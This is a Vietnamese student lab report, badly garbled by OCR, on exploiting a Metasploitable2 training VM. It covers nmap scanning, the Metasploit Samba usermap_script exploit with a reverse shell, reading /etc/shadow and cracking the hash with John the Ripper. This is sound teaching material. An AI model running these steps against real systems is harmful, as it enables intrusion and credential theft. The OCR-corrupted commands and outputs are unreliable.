Tìm hiểu về các lỗ hỗng bảo mật trên một số DV của Ubun£u.... Quét máy vicim Metasploitable2 tìm các lỗ hỗng tồn tại.... - Tìm hiểu vẻ các lỗ héng một số dịch vụ, phân mềm trên HĐH, - L
Trang 1
HOC VIEN CONG NGHE BUU CHINH VIEN THONG KHOA AN TOAN THONG TIN 1
PlaT
Mén hoc: AN TOAN HE DIEU HANH BAO CAO BAI THUC HANH SO
1
Sinh viên thực hiện: Lã Thế Khanh
Mã sinh viên: B2IDCAT109 Giảng viên: Hoàng Xuân Dậu
Trang 2
+ ha .ă ằằ.ốắẽ 3
2 Các phần mềm, công cụ cần có - n2 2H tr HH Hà HH H212 212tr Hà ng teen 3
3 Tìm hiểu về các lỗ hỗng bảo mật trên một số DV của Ubun£u S HH Hee 3
4, NOi dung thure ham 6n ẮẮ5Ắ5 3
41 Cài đặt các công cụ, nền tẳng ác ch nh HH nà HH HH He Hang rat 3 4.2 Quét máy vicim Metasploitable2 tìm các lỗ hỗng tồn tại nhang euue 7 4.3 Khai thác tim phién ban Samba đang hoạt động: LH nh HH He 9 4.4 Khai thác lỗi trên Samba cho phép mở shell chạy với quyền roo( Sen 11
5 Yêu cầu cần đạt nh nhà n2 HH HH2 Hà Hà Hà H21 212 r2 n2 12H gu rau 13
Trang 34
4.1
- Tìm hiểu vẻ các lỗ héng một số dịch vụ, phân mềm trên HĐH,
- Luyện thực hành tân công kiêm soát hệ thông chạy Ubuntu từ xa sử dụng công cụ tân công Metasploit trén Kali Linux
Các phần mềm, công cụ cần có
- Kali Linux
- Metasploit
- Metasploitable2: máy ảo VMWare chứa lỗi, có thê tải tại:
http://sourceforge.net/projects/metasploitable/files/Metasploitable2/
Tìm hiểu về các lỗ hỗng bảo mật trên một số DV của Ubuntu
-Metasplortable2 là một máy ảo VMWare được tích hợp nhiều dịch vụ chứa các lỗi bảo mật đã biết cho phép khai thắc kiểm soát hệ thống từ xa phục vụ học tập Danh sách các lỗ héng va
hướng dân khai thac co thé tim tai: https:/Awww.hackingarticles.in/comprehensive-guide-on-
metasploitable2/ Lỗ hông là lỗ hỗng bảo mật CVE-2007-2447 trén dich vu chia sé file SMB
(Samba) với các phiên ban Samba 3.0.0 đến 3.0.25rc3 có thé cho phép thực thi mã từ xa Chỉ tiết
về lô hông này có thê tìm tại: https://nvd.nist.gov/vuln/detail/CVE-2007-2447,
Nội dung thực hành
Cài đặt các công cụ, nền tang
- Cài đặt Kali Linux (nếu chưa cài đặt) trên l máy ảo (hoặc máy thực)
o Bán ISO của Kali Linux có thể tải tại: https:/www kali.org/get-kali/#kali-baremetal
o Ban cai sẵn trên máy ảo của Kali Linux có thể tải tại: https://www.kali.org/getkali/#kali-virtual- machines
o Đôi tên máy Kali Linux thành dạng Mã SV-Tên-Kali : B2IDCAT109-Khanh-
Kali
Trang 4kali@B21DCAT109-Khanh-Kali: ~
~
-Kiém tra và chạy thử bộ công cụ tấn công MetaSploit
~ Tải và cải đặt Metasploitable2 lam may victim:
o Tai Metasploitable2
o Giai nén
o Sử dụng VMWare Player hoặc VMWare để mở và khởi động máy ảo Tài khoản đăng nhập vào
hệ thống là msfadmin / msfadmin
Trang 5Contact: msfdeu[atlnetasploit.com
Login with msfadmin/msfadmin to get started
metasploitable login: msfadmin
Password:
Last login: Tue Mar 19 17:40:06 EDT 2024 on ttyi
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 The programs included with the Ubuntu system are free software:
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law
To access official Ubuntu documentation, please visit:
http:⁄⁄Zhelp.ubun£tu con⁄
In chà
nsfadmin@metasploitable:~$ a
- Tạo một người dùng mới trên máy ao
© Tạo mới người dùng cho mình: sudo useradd khanhlt109 ; ; ;
o Tao mat khâu cho người dùng: sudo passwd khanhlt109, nhập mật khâu mới 2 lân (mật khâu là
Trang 6sudo: unable to resolve host B21DCAT109-Khanh-Meta
[sudo] password for msfadmin:
nsf admin@B21DCAT109-Khanh-Meta:~§ sudo passwd khanh1t109
123
sudo: unable to resolve host B21DCAT109-Khanh-Meta
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
-Đặt lại tên máy chứa lỗi là Mã SV+Họ và tên
GNU nano 2.0.7 File: /etc/hostname
21DCâT109-Khanh-Heta
Saue modified buffer (âNSUERING ”No” UILL DESTRUY CHâNGES) ?
-Khoi dong lai may victim
Trang 7
B21DCâT109-Khanh-Heta
[ Wrote 1 line 1
a
msfadmin@metasploitable:~9 sudo reboot_
-Doi tén thanh cong
Warning: Never expose this VM to an untrusted network?
Contact: msfdeu[atlnetasploit.con
Login with msfadnin⁄nsfadnin to get started
B21DCAT109-Khanh-Meta login: nsfadnin
Passuo
Last login: Tue Har 19 29:34 EDT 2024 on ttyl
Linux B21DCAT109-Khanh-Meta 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law
To access official Ubuntu documentation, please visit:
http:/7help.ubuntu.com/
No mail
nsf admin@B21DCAT109-Khanh-Meta:~$ _
4,2 Quét may victim Metasploitable2 tim các lỗ héng ton tại
- Tim dia chi IP cua may victim, kali:
oö Chạy lệnh trong cửa sô terminal: ifconfig eth0
Trang 8nsfadmin@B21DCAT109-Khanh-Meta:~§ ifconfig et
etho Link encap:Ether HWaddr 00:0c:2
inet addr:192 BI ? Beast
inet6 addr: fe :29ff :fed4c:1bdb/ ope: Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:51 errors:9 dropped:9 overruns:9 frame:9
TX packets:?? errors:9 đropped:9 ouerruns:Ð carrier:0
collisions:90 txqueuelen: 1099
RX byutes:4948 (4.8 KB) TX bytes:8186 (7.9 KB)
Interrupt:1?7 Base address :0x2000
- Kiêm tra kết nôi mạng giữa các máy:
o Tir may victim, chay lénh ping
msfadmin@B21DCAT109-Khanh-Meta:~§ ping 192.168.1.11 -c 4
PING 192.168.1.11 (192.168.1.11) 56(84) bytes of data
64 bytes from 192.168.1 : icmp_seq=1 tt1l=128 time=14.7
64 by from 192.168.1 : icmp_seq=2 tt1=128 time=1.48
64 by from 168.1 : icmp_s 3 tt1=128 tine=1.46
64 bytes from 192.168.1 : icmp_seq=4 ttl=128 time=1.14
168.1.11 ping stat
4 pac s transmitted, 4 r ived, 0% packet s, time 2999ms rtt min/avg/max- 142⁄4.722⁄14.798⁄5.81
192.168.131.147 -c 4
.168.131.147 (192.168.131.147) 56(84) bytes of data
from 192.168.131.147: icmp_seq=1 ttl=64 time=1.08 ms
from 192.168.131.147: icmp_seq=2 ttl=64 time=0.656 ms
from 192.168.131.147: icmp_seq=3 ttl=64 time=2.08 ms
from 192.168.131.147: icmp_seq=4 ttl=64 time=0.712 ms
192.168.131.147 ping statistics -
packets transmitted, 4 received, 0% packet loss, time 3033ms
tt min/avg/max/mdev = 0.656/1.130/2.078/0.570 ms
- Sử dung cong cu nmap dé rà quét các lỗ hông tôn tại trên máy chạy Metasploitable2:
o Quét cong dich vu netbios-ssn công 139: nmap script vuln -p139
(kali B21DCAT109-Khanh-Kali)-[~]
$ nmap script vuln -p139 192.168.131.147
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 21:28 EDT
map scan report for 192.168.131.147
ost is up (0.0017s latency)
PORT STATE SERVICE
39/tcp open netbios-ssn
ost script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
map done: 1 IP address (1 host up) scanned in 141.16 seconds
Trang 9
Uta Pee ll eee ewe
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 21:32 EDT
Nmap scan report for 192.168.131.147
Host is up (@.00086s latency)
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
Nmap done: 1 IP address (1 host up) scanned in 140.85 seconds
4.3 Khai thác tìm phiên bản Samba đang hoạt động:
- Khới dong Metasploit
Trang 10more with hetp log
kkM\M(
See ee ee ed
ae Pee +:+
+fữ+t+:++f+
+:+
Metasptoit
=[ metasploit v6.3.55-dev
+ =[ 2397 exploits - 1235 auxiliary - 422 post
+ =[ 1391 payloads - 46 encoders - 11 nops
+ =[ 9 evasion
Metasploit Documentation: https://docs.metasploit.com/
f6 > |
- Khai báo sử dụng mô đun tấn công: msf > use auxiliary/ scanner/ smb/smb_ version
- Chạy lệnh “show options” để xem các thông tin về mô đun tấn công đang sử dụng
Metasploit Documentation: http: (Sect 0177)
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiLiary( - - . ) > show options
Module options (auxiLiary/scanner/smb/smb version):
Nane Current Setting Required bì ription
/docs metasp1oit com/docs/using-metasp1oit/basics/using-metasptoit httrL RHOSTS ee ht
THREADS 1 yes H U02 4 2.-(‹ LH (max one per host
View the fuL( module info with the aM cormmand
msf6 auxiliary(scanser/smb/onb version) > ff
- Dat dia chi IP may victim: msf > set RHOST 192.168.131.147
- Thực thi tân công: msf> run
Trang 11RHOST => 192.168.131.147
sf6 auxiLiary( )> run
192.168.131.147:445 - SMB Detected (versions:1) (preferred diaLect:) (signatures:optionaL)
192.168.131.147:445 - Host could not be identified: Unix (Samba 3.0.20-Debian)
192.168.131.147: - Scanned 1 of 1 hosts (100% complete)
AuxiLiary modute execution compteted
sf6 auxiliary( ) > exit
4.4 Khai thác lỗi trên Samba cho phép mỡ shell chạy với quyén root:
- Khới dong Metasploit
- Khai báo sử dụng mô đun tần công: msf> use exploit/multi/samba/usermap_seript
- Chạy lệnh “show options” dé xem cac thông tin về mô đun tân công đang sử dung
letaspLoit tip: You can wse help to view a\L available comman4s
_
- Dat dia chi IP may victim: msf> set RHOST 192.168.131.147
- Chon payload cho thu thi (mo shell): msf > set payload cmd/unix/reverse
- Đặt 445 là công truy cập máy victim: msf > set RPORT 445
- Chạy lệnh “show options” để xem các thông tin về thiết lập tấn công đang sử đụng
Trang 12payload => cmd/unix/reverse
msf6 exploit( - -: - ) > set RPORT 445
IRPORT => 445
lmsf6 exptoit(-' -: -. ) > show options
Module options (exploit/multi/samba/usermap_script):
Current Setting Required Description
The local client address The tocat cLient por'
no A proxy chain of format typeshost:port[,type:host:port][ ]
192.168.131.147 yes The target host(s), see https://docs.metaspLoit.com/docs/ ng-metasp1oit/basics/using-metasp1oit htm1
X45 yes The target port (TCP}
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
LHOST 192.168.131.145 yes The listen address (an interface may be specified)
LPORT 4444 yeS I1 N.:
Exploit target:
Nane
Automatic
View the fuLL moduLe info with the A s20 0Ì
-Thực thi tan công: msf> exploit > Cửa hậu mở shell với người dùng root cho phép chạy lệnh từ
may Kali > co thê thực hiện bất cứ lệnh shell nào trên máy victim
- Chạy các lệnh đề đọc tên người dùng và máy đang truy cập: whoami , uname -a
sf6 exploit( ˆ - -.- - - ) > exploit
Started reverse TCP doubte handter on 192.168.131.145:4444
Accepted the first client connection
Accepted the second client connection
Command: echo FRSTpEERSSd624W0;
Writing to socket A
Reading from sockets
Reading from socket B
B: "FR5TpEERSSd624W0\r\n"
Matching
A is input
Command shell session 1 opened (192.168.131.145:4444 -> 192.168.131.147:47071) at 2024-03-19 22:50:28 -0400
at /etc/shadow | grep khanhtt109
IP0086121$v\/t1L0QCz$Ca5ACgvJ1e1Jb0Y BKzHk : 19802 : 0: 99900: 7: : :
- Chọn và sao chép cả dòng tên người đùng và mật khâu băm vào elipboard
- Mở một cửa sô Terminal mới, chạy lệnh: nano password sau đó paste thông tin tên người đùng
và mật khâu băm từ clipboard vào file password
Gõ Ctrl-x để lưu vào file
Trang 13GNU nano 7.2 password *
hanh1t169 :$1$vVt11QCz$Ca5ACgv.Jie1JbOY „ BKz Hk : 19862 : 6 :99999 ; 7: : :
Write saris 0ut eas wh 1 cut Do ia 3ustify Stats reer Locati No — ễ HH ee eld mi Loa Oat
- Crack đê lây mật khâu sử dụng chương trình John the ripper (hoặc I công cụ crack mật khâu
khác):
john show password
kali@ B21DCAT109-Khanh-Kali
S john /home/kali/password
larning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-Long”
se the " format=md5crypt-Long” option to force toading these as that type instead
sing defautt input encoding: UTF-8
Loaded 1 password hash (mdScrypt, crypt(3) $1$ (and variants) [MD5 512/512 AVX512BW 16x3])
11L run 4 OpenMP threads
Proceeding with single, rules:Single
Press ‘q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any
Proceeding with wordList: /usr/share/john/password Lst
) 1g 0:00:00:00 DONE 2/3 (2024-03-20 11:05) 16.66g/s 50400p/s 50400c/s 50400C/s 123456 bigben
se the elie) Re) he RMD ee LRM nee Cel CM Sa eee a
Session completed
kali® B21DCAT109-Khanh-Kali
$ john ” password
hanh1t109:123:19802:0:99999:7:::
i password hash cracked, @ left
-Gõ Ctrl c đê kết thúc
5 Yêu cầu cần đạt
1 Thanh thao cai dat va chay may ao Ubuntu
2 Thanh thao sir dung Metasploit dé tan céng khai thác lỗ hông sử dụng thư viện có sẵn
3 Chụp ảnh mản hình kết qua lưu vao file (hoặc giữ nguyên cửa số mản hình thực hiện):
a Màn hình quét các lỗ hông
b Màn hình phiên bản Samba
e Màn hình sau khi tấn công thành công và chạy các lệnh whoami và uname -a trên hệ thống
13
Trang 14d Màn hình chạy lệnh cat trích xuất tên và mật khâu người dùng
e Màn hình crack mật khâu.